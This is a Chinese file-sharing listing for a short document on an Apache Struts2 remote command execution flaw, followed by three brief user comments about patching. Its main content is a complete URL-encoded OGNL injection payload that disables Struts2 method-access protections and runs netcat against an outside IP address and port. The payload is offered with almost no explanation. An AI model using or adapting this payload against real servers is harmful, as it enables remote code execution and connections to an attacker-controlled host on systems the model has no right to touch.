【文件属性】:
文件名称:Apache的Struts2框架严重安全漏洞
文件大小:14KB
文件格式:DOCX
更新时间:2013-08-09 05:31:26
Apache Struts2 框架 安全漏洞
Apache的Struts2框架最近出了一个很严重的漏洞,可以直接执行系统命令
http://www.163.com?%28%27\u0023_memberAccess[\%27allowStaticMethodAccess\%27]%27%29%28meh%29=true&%28aaa%29%28%28%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003d\u0023foo%27%29%28\u0023foo\u003dnew%20java.lang.Boolean%28%22false%22%29%29%29&%28asdf%29%28%28%27\u0023rt.exec%28%22/usr/bin/nc%2067.205.52.169%208888%22%29%27%29%28\u0023rt\u003d@java.lang.Runtime@getRuntime%28%29%29%29=1
网友评论
- 已经过时了,现在有更多其他的包,反正struts2 就不安全。
- 这个漏洞很多人都知道了,都不上了
- 最近struts2的漏洞很猖狂,得赶紧把漏洞修补上